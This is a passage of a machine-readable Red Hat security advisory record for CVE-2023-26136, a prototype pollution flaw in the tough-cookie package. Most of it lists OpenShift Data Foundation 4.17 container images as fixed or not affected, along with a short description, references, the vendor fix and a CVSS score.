"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2219310", }, ], notes: [ { category: "description", text: "A flaw was found in the tough-cookie package which allows Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.", title: "Vulnerability description", }, { category: "summary", text: "tough-cookie: prototype pollution in cookie memstore", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2023-26136", }, { category: "external", summary: "RHBZ#2219310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2219310", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2023-26136", url: "https://www.cve.org/CVERecord?id=CVE-2023-26136", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2023-26136", url: "https://nvd.nist.gov/vuln/detail/CVE-2023-26136", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e", url: "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/issues/282", url: "https://github.com/salesforce/tough-cookie/issues/282", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3", url: "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3", }, { category: "external", summary: "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html", url: "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html", }, { category: "external", summary: "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873", url: "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873", }, ], release_date: "2023-07-01T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", 